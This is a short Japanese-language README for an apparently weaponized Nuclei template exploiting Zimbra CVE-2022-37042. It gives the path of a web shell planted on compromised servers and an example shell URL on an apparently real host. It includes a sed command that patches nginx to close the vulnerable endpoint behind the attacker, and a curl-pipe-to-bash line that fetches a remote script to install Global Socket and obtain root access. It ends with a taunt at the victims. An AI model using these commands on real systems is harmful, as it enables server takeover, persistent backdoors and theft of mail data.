
Zimbra CVE-2022-37042 Nuclei 武装化テンプレート
シェルパス: /public/formatter.jsp
Nuclei 自体: https://github.com/projectdiscovery/nuclei
シェルには不透明度0の隠し入力があります。マウスをホバーしてコマンドを入力し、[Enter]キーを押してください:
シェルURLの例:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
次のコマンドを実行してください(ただし1回だけ):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
NginxではなくApacheを使用するサーバーには追加のコードが必要です。プルリクエストを歓迎します。
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
このコマンドはグローバルソケット (https://www.gsocket.io/deploy/) をインストールし、ルートとして接続するためのキーを提供します。
ハッピーバースデー・マサカー、クソ野郎ども ;)